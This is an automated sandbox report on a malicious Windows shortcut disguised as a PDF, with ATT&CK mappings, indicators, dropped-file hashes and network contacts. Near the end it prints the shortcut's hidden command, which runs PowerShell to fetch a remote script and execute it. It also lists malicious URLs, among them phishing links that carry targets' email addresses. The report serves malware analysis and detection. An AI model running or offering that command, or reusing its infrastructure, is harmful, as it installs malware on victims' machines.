Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe Code function: 4_2_00007FF63EA19CD8 GetSystemTime,SystemTimeToFileTime,GetLastError,SLGetWindowsInformation,LocalFree,GetProcessHeap,HeapFree, 4_2_00007FF63EA19CD8
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe Code function: 4_2_00007FF63EA11F10 StrToID,?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z,?AddListener@Element@DirectUI@@QEAAJPEAUIElementListener@2@@Z, 4_2_00007FF63EA11F10
MITRE ATT&CK matrix (tactic: techniques; the number in parentheses is the matching-signature count shown for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Native API (1); PowerShell (2); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (111); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (11); Virtualization/Sandbox Evasion (21); Process Injection (111); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (12); Timestomp (1); DLL Side-Loading (1); Indicator Removal from Tools
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (1); Query Registry (1); Security Software Discovery (21); Process Discovery (11); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (3); System Information Discovery (24)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (14); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus detection (Source / Detection / Scanner):
Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk: 15% (Virustotal)
Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk: 13% (ReversingLabs)
Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk: 100% (Joe Sandbox ML)
Dropped files:
C:\Users\user\AppData\Local\Temp\Onedrive.exe: 0% (ReversingLabs)
C:\Users\user\AppData\Local\Temp\sppc.dll: 0% (ReversingLabs)
Domains: No Antivirus matches
Contacted domains (Name / IP / Active / Malicious / Antivirus Detection / Reputation):
bangla.b-cdn.net, 89.35.237.170, active: true, malicious: true, reputation: unknown

Contacted URLs (Name / Malicious / Antivirus Detection / Reputation):
https://bangla.b-cdn.net/sppc.dll, malicious: false, Avira URL Cloud: safe, reputation: unknown
https://47.84.196.148/reports, malicious: true, Avira URL Cloud: safe, reputation: unknown
https://bangla.b-cdn.net/onedrive.dll, malicious: false, Avira URL Cloud: safe, reputation: unknown
https://bangla.b-cdn.net/g1.ps1, malicious: false, Avira URL Cloud: safe, reputation: unknown
http://bangla.b-cdn.net/g1.ps1, malicious: false, Avira URL Cloud: safe, reputation: unknown
Contacted IPs (IP / Domain / Country / ASN / ASN Name / Malicious):
89.35.237.170, bangla.b-cdn.net, Romania, ASN 34304, TEENTELECOMRO, malicious: true
47.84.196.148, unknown, United States, ASN 3209, VODANETInternationalIP-BackboneofVodafoneDE, malicious: true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1578249
                              Start date and time:2024-12-19 13:34:08 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 34s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:9
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk
                              Detection:MAL
                              Classification:mal92.evad.winLNK@7/9@1/2
                              EGA Information:
                              • Successful, ratio: 50%
                              HCA Information:
                              • Successful, ratio: 98%
                              • Number of executed functions: 17
                              • Number of non-executed functions: 179
                              Cookbook Comments:
                              • Found application associated with file extension: .lnk
                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63, 4.245.163.56
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target powershell.exe, PID 7736 because it is empty
• Not all processes were analyzed, report is missing behavior information
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type              Description
07:35:02  API Interceptor   53x Sleep call for process: powershell.exe modified
07:35:16  API Interceptor   11249644x Sleep call for process: Onedrive.exe modified
IPs
Match: 89.35.237.170
Associated Sample Name / URL | Detection | Threat Name
https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8= | malicious | Unknown
https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f | malicious | Unknown
http://home45insurance.blogspot.com | malicious | Unknown
http://home45insurance.blogspot.com | malicious | Unknown
https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.com | malicious | HTMLPhisher
https://computeroids.com/hp-printer-driver?utm_source=Google&utm_medium=Click&utm_campaign=HP&utm_term=%7Bkeywords%7D&utm_content=%7Bmedium%7D&tm=tt&ap=gads&aaid=adaHxflMmgPq7&camp_id=12260099411&ad_g_id=118845692873&keyword=install%20hp%20printer%20to%20computer&device=c&network=searchAd&adposition=&gad_source=5&gclid=EAIaIQobChMI0JDUvuabigMV_Uf_AR2MuQCMEAAYASAAEgKQMPD_BwE | malicious | PureLog Stealer
https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.com | malicious | HTMLPhisher
https://ytfjghloadv1.b-cdn.net/proCESSINGveriffv001.html | malicious | CAPTCHA Scam ClickFix, LummaC Stealer
https://shorturl.at/aRqLH/ | malicious | Unknown
https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embed | malicious | HTMLPhisher

Domains
No context

ASNs
Match: TEENTELECOM (RO)
Associated Sample Name / URL | Detection | Threat Name | Context
https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8= | malicious | Unknown | 89.35.237.170
https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f | malicious | Unknown | 89.35.237.170
http://home45insurance.blogspot.com | malicious | Unknown | 89.35.237.170
http://home45insurance.blogspot.com | malicious | Unknown | 89.35.237.170
https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.com | malicious | HTMLPhisher | 89.35.237.170
https://computeroids.com/hp-printer-driver?utm_source=Google&utm_medium=Click&utm_campaign=HP&utm_term=%7Bkeywords%7D&utm_content=%7Bmedium%7D&tm=tt&ap=gads&aaid=adaHxflMmgPq7&camp_id=12260099411&ad_g_id=118845692873&keyword=install%20hp%20printer%20to%20computer&device=c&network=searchAd&adposition=&gad_source=5&gclid=EAIaIQobChMI0JDUvuabigMV_Uf_AR2MuQCMEAAYASAAEgKQMPD_BwE | malicious | PureLog Stealer | 89.35.237.170
https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.com | malicious | HTMLPhisher | 89.35.237.170
https://ytfjghloadv1.b-cdn.net/proCESSINGveriffv001.html | malicious | CAPTCHA Scam ClickFix, LummaC Stealer | 89.35.237.170
https://shorturl.at/aRqLH/ | malicious | Unknown | 89.35.237.170
https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embed | malicious | HTMLPhisher | 89.35.237.170
Match: VODANET International IP-Backbone of Vodafone (DE)
Associated Sample Name / URL | Detection | Threat Name | Context
mipsel.nn.elf | malicious | Mirai, Okiru | 47.84.100.146
arm5.nn.elf | malicious | Mirai, Okiru | 88.69.110.109
mips.nn.elf | malicious | Mirai, Okiru | 88.72.154.222
mips.nn.elf | malicious | Mirai, Okiru | 178.9.13.231
la.bot.sparc.elf | malicious | Mirai | 88.67.178.149
la.bot.arm.elf | malicious | Mirai | 109.46.80.93
la.bot.mipsel.elf | malicious | Mirai | 94.218.243.142
loligang.spc.elf | malicious | Mirai | 2.205.237.167
arm.nn.elf | malicious | Mirai, Okiru | 139.7.173.41
powerpc.nn.elf | malicious | Mirai, Okiru | 84.62.157.32

JA3 Fingerprints
Match: 72a589da586844d7f0818ce684948eea
Associated Sample Name / URL | Detection | Threat Name | Context
invoice.html | malicious | Unknown | 47.84.196.148
BjLxqVU7m4.dll | malicious | Unknown | 47.84.196.148
Ne7qNMCeuy.exe | malicious | Unknown | 47.84.196.148
Q7I4ToJZ0R.exe | malicious | Unknown | 47.84.196.148
BjLxqVU7m4.dll | malicious | Unknown | 47.84.196.148
Ne7qNMCeuy.exe | malicious | Unknown | 47.84.196.148
Q7I4ToJZ0R.exe | malicious | Unknown | 47.84.196.148
LgigaSKsL6.exe | malicious | SmokeLoader | 47.84.196.148
file.exe | malicious | SmokeLoader | 47.84.196.148
mGFoU1INUk.exe | malicious | SmokeLoader | 47.84.196.148
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name | Context
LbtytfWpvx.vbs | malicious | Remcos | 89.35.237.170
YinLHGpoX4.vbs | malicious | GuLoader, RHADAMANTHYS | 89.35.237.170
raEyjKggAf.ps1 | malicious | Unknown | 89.35.237.170
gCXzb0K8Ci.ps1 | malicious | Unknown | 89.35.237.170
H2PspQWoHE.ps1 | malicious | Unknown | 89.35.237.170
0iTxQouy7k.vbs | malicious | GuLoader, RHADAMANTHYS | 89.35.237.170
H6epOhxoPY.ps1 | malicious | Unknown | 89.35.237.170
KcKtHBkskI.ps1 | malicious | Unknown | 89.35.237.170
1M1QoJF40r.ps1 | malicious | Unknown | 89.35.237.170
StGx54oFh6.exe | malicious | Quasar | 89.35.237.170

Dropped Files
No context
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):11608
                                                  Entropy (8bit):4.890472898059848
                                                  Encrypted:false
                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1408
                                                  Entropy (8bit):5.4377522977757575
                                                  Encrypted:false
                                                  SSDEEP:24:3iXSKco4KmBs4RPT6BmFoUe7uomjKcm9qr9t7J0gt/NKCpnd+9tNvr6TN0:mSU4y4RQmFoUeComfm9qr9tK8NLpk9PH
                                                  MD5:B122EC93FFA48D0A76F85CF88207006F
                                                  SHA1:12D6C27E701D9235D0676300FABDADB9370395E3
                                                  SHA-256:F22A2D8ADA5CD8B8B5707B6623F6ED515CE0781BCE270A0787DF1DB7F4AF3EC7
                                                  SHA-512:755AB7BB2F874B0F26FB6C3545458AFD925603235FB7B6999CFD48345F1794B98F61373DEF01ECB58B5AC92DA5AF0F49EB0BDBB0CF9BD220891D7E3E492755AF
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:@...e................................................@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):110536
                                                  Entropy (8bit):6.479810480369939
                                                  Encrypted:false
                                                  SSDEEP:1536:X35P3jusa9Y8yQ7tCyFvKfD/B1Tu00arKEYdkulZg6nILNnjjtCPd+:HhyvPn3BKfD/BmDd46naIl+
                                                  MD5:32C31F06E0B68F349F68AFDD08E45F3D
                                                  SHA1:E4B642F887E2C1D76B6B4777ADE91E3CB3B9E27C
                                                  SHA-256:CEA83EB34233FED5EBEEF8745C7C581A8ADBEFBCFC0E30E2D30A81000C821017
                                                  SHA-512:FE61764B471465B164C9C2202ED349605117D57CEB0ECA75ACF8BDA44E8744C115767EE0CAED0B7FEB70BA37B477D00805B3FDF0D0FA879DD4C8E3C1DC1C0D26
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......i.`.-...-...-...$......9.../...9...:...9...)...9...6...-.......9...5...9...,...9...,...Rich-...........................PE..d................."............................@....................................-................ .......................................?.......... J...p...........%..........p1..T.......................(................... ................................text............................... ..`.imrsiv..................................rdata..|H.......J..................@..@.data........`.......0..............@....pdata.......p.......2..............@..@.rsrc... J.......L...<..............@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):103935
                                                  Entropy (8bit):7.99838838197664
                                                  Encrypted:true
                                                  SSDEEP:3072:60qxVYqu86EBItwjTJ1wMJVKhoTivyCegz27:+YquBEBkIJ1wyK6TiaCy7
                                                  MD5:3465C5A7982478CA2CE4879588765BEF
                                                  SHA1:521090C64B1F8B9CD85AC4B30A8F3AB074A48B87
                                                  SHA-256:265EB6BAFC6578DC502F61164D005E19BD2C4779ACFA9D1A1451741173C26D2A
                                                  SHA-512:DCB165BF63D7EAA840152387B28168F9421ADA445B1921CB8065D94F9A90AD3870971D5585398F4065869D965B5EFE0C1C033646B3B764B22EFB7F7648B714E7
                                                  Malicious:false
                                                  Preview:....U.u.y..y..f..A.....V...*~.."fv...9......Pc...V6.P.x./0;.P..h...).Gz.H..;_.)......s(l.....yh..V..L..c..#Tj....<b....'.a..3....|.W....Vy..k."....9..}U"4...@0Z4^.-..-......*.#......A..u........d.7.......~N.....x.K.5.q.=...&=N:...4.<...i.$6.4.....y..2.......b..U?.tdC.7..o.b..w..Z.......|u...4....0..iP..........qP6.S.h...W..?........._.Z,.....9....].......j. .+OR...\_.U..V...Y\....K.J.*.(......~.8..s....qm.K.-..T.....j.....".z...0g..b.H..K....a.W..U......@..X....d$.}.L..i.y.*.J."..t.%aJ...x"..T._.Es2.T[.rV-m.w.J@....*Y...<cZ.=.r.y..i....2>...nn...I&...!.<.....M...\P-.t.x.M.............\F0....M..g.?..N.p.RT........p5(0<B...N.k..ME........0..?.....G.k..p..a(..M?.'(t...mY..4.'u....ia.....Q...WU..$?);N&...E..np.......cj.R._...mE...t.."..".OX.....u.).........e...M.V..v ....3....L..,]......6...h.X...)...x..b.}.-k.,.....s../......<M}_..l..:..........v.Pf.. A9n!........R.6..q. "...'....?.?*:.c...Y........m.....U+..m.. H..a*..%....[..M..Cx.)...y.
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):371712
                                                  Entropy (8bit):5.759165377548223
                                                  Encrypted:false
                                                  SSDEEP:6144:Uw0S36K/TZciXhJD1LrYwcjyZSIFGzLlN2A/W7vsg+Nq:Uw0S36K/TZciXhJj4I8zLl/e7vsg+o
                                                  MD5:24E4E24E91E1FD8ACBEF02ABF5997317
                                                  SHA1:9EDA6BE281400218C011380929F6879DBF48754C
                                                  SHA-256:758BB067ECC1D7832D1B389CFA85B70376645694C60B5D017747B1E1664CB2F6
                                                  SHA-512:BCCB40046F1FD4C4A68422912BE4B484B7B80402111D8093EB00ECA74D831947E7B9D03E1E403A677885263EB36C130D495A7A817AAAF8EE78A5B1F64B58D357
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>...z.z.z.1...}.1.....1...p.jb..s.jb..t.jb..Z.1...y.z...1c..y.1c..{.1cH.{.1c..{.Richz.........................PE..d...N.Yg.........." ...)............ .......................................0............`..........................................Y.......p..(...............|2........... ......@=..p............................<..@............ ...............................text...-........................... ..`.rdata...Y... ...Z..................@..@.data....I...........b..............@....pdata..|2.......4...n..............@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6221
                                                  Entropy (8bit):3.7181238579248297
                                                  Encrypted:false
                                                  SSDEEP:96:JAXy33CxHS1MkvhkvCCt/wfpXHcwfpAHn:JAXyyy1I/wuw4
                                                  MD5:DC426AC81BE0EF592DBC7AB9F407CE14
                                                  SHA1:C3B36A3A32210B073380B168757D1244B49E89A1
                                                  SHA-256:673FC0FF97571F98A2C99C17E3769136561BA70672F505D434644ADC3ECC3513
                                                  SHA-512:F948451610E766B23B6749908BE12B8EE621BE5B6A85AC8AA9E9A89A40AF478A7F5557C6E509981E3017EE3DD3CC9E7DE76FA50FBD8238A9A66D12B08D81D6AA
                                                  Malicious:false
                                                  Preview:...................................FL..................F.".. ...-/.v.....7.k.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v......`g.R...^.k.R......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y]d...........................%..A.p.p.D.a.t.a...B.V.1......Y[d..Roaming.@......CW.^.Y[d...........................cG.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Yad..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................#...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Yad....Q...........
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6221
                                                  Entropy (8bit):3.7181238579248297
                                                  Encrypted:false
                                                  SSDEEP:96:JAXy33CxHS1MkvhkvCCt/wfpXHcwfpAHn:JAXyyy1I/wuw4
                                                  MD5:DC426AC81BE0EF592DBC7AB9F407CE14
                                                  SHA1:C3B36A3A32210B073380B168757D1244B49E89A1
                                                  SHA-256:673FC0FF97571F98A2C99C17E3769136561BA70672F505D434644ADC3ECC3513
                                                  SHA-512:F948451610E766B23B6749908BE12B8EE621BE5B6A85AC8AA9E9A89A40AF478A7F5557C6E509981E3017EE3DD3CC9E7DE76FA50FBD8238A9A66D12B08D81D6AA
                                                  Malicious:false
                                                  Preview:...................................FL..................F.".. ...-/.v.....7.k.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v......`g.R...^.k.R......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y]d...........................%..A.p.p.D.a.t.a...B.V.1......Y[d..Roaming.@......CW.^.Y[d...........................cG.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Yad..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................#...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Yad....Q...........
                                                  File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Archive, ctime=Mon Nov 25 05:23:08 2024, mtime=Mon Dec 9 04:00:07 2024, atime=Mon Nov 25 05:23:08 2024, length=339968, window=hide
                                                  Entropy (8bit):4.5252541581078685
                                                  TrID:
                                                  • Windows Shortcut (20020/1) 100.00%
                                                  File name:Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk
                                                  File size:1'073 bytes
                                                  MD5:1fdc0eb15af0f989e5cc7ab9fc8e14ec
                                                  SHA1:b15076953f50268ca6e5cc57f3279a3652da5311
                                                  SHA256:623767715bd1a33c41e2de8ab3af341e629105132c3434f454cf249f98adbfd7
                                                  SHA512:6724c23940bea1d328aa39364a0ff82d7c94c560045316ea265fe4e75d950f75f597c6d14ebf62da875a22db5df0f03c770ebaaab854becf089eef14d579661d
                                                  SSDEEP:12:8nHnY0m/B/JwsseVSXPY1sld4lMn8fALlJlM3GNcW+UcZ5wiuaXxQLZMUmK7nYbg:8HYJJ/JvYnzTv+/Z5xCVMUDYYqVKp
                                                  TLSH:1A113A192EFA0B14E6B69E3398BB97205E7BFD45EE70570D12855A090C62A10E921F37
                                                  File Content Preview:L..................F.... ......~.?.....7.I...@.~.?...0......................5....P.O. .:i.....+00.../C:\...................V.1.....}Y.D..Windows.@........X.:.Y. ...........................'..W.i.n.d.o.w.s.....Z.1......YJ7..System32..B........X.:.Y. ......
Icon Hash: 929e9e96a3f3d6ed

General

Relative Path: ..\..\..\Windows\System32\cmd.exe
Command Line Argument: /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}"
Icon location: %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe

Timestamp                        SID      Signature                                           Severity  Source IP    Source Port  Dest IP        Dest Port  Protocol
2024-12-19T13:35:09.604537+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH   2         192.168.2.4  49732        89.35.237.170  80         TCP
2024-12-19T13:35:11.835744+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH   2         192.168.2.4  49733        89.35.237.170  443        TCP
